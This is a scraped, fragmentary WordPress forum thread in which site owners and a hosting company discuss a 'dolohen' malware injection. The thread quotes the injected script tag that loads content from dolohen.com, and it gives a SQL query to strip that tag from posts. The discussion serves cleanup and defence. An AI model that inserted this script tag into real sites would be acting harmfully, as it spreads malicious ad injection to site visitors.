I took a look at your website at https://hattonwillow.co.uk/ and found this:
<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script>
I believe this may have been injected into your /wp-includes/functions.php file.
Can you do a search for dolohen within that file?
Dave
]]>Also could you please remove my website address from your reply as I don’t want it to appear in google search results.
Any other ideas?
Thanks
]]>I have just re-opened the malware ticket that I had opened with tsohost. The person couldn’t even find the adverts so I don’t hold out much hope. I told him to open my website and click on any link!!!
I think we are all on the same range of database servers. Andrew?
]]>https://www.wordfence.com/blog/2018/02/service-vulnerability-nfs-permissions-problem/
]]>wp_posts SET post_content = REPLACE(post_content, ‘<script type=”text/javascript” src=”//dolohen.com/apu.php?zoneid=676630″ async data-cfasync=”false”></script>’, ”) WHERE post_content LIKE ‘%<script type=”text/javascript” src=”//dolohen.com/apu.php?zoneid=676630″ async data-cfasync=”false”></script>%’ COLLATE utf8mb4_bin
Obviously this won’t make a difference if it gets infected again straight away.
]]>I have further investigated the case with our seniors and this dolohen hack seems to be quite the new occurrence.
I found a topic which breaks it down a bit –
https://medericburlet.com/dolohem-wordpress-malware/
Most of our databases begin with 10.169.0, so that won’t be the pattern here.
Please also keep in mind that all cases are on WP CMS, which makes this more related to a WP vulnerability, than to our database servers.
I can also recommend following https://www.wordfence.com/blog/ and https://blog.sucuri.net/ for any updates and vulnerability updates from popular web security specialists.
I completely understand your concerns in regards to our servers, but i can assure you our database servers are fully secured and no breach was detected whatsoever as of now. We are still looking further into the case and we will make sure to get to the bottom of this supposed security breach, whether it’s related to us or to WordPress on our hosting.
Make sure to keep all your plugins updated to the latest version, as well as your WordPress version to the latest one, as that is the best way to be as secured as possible.
]]>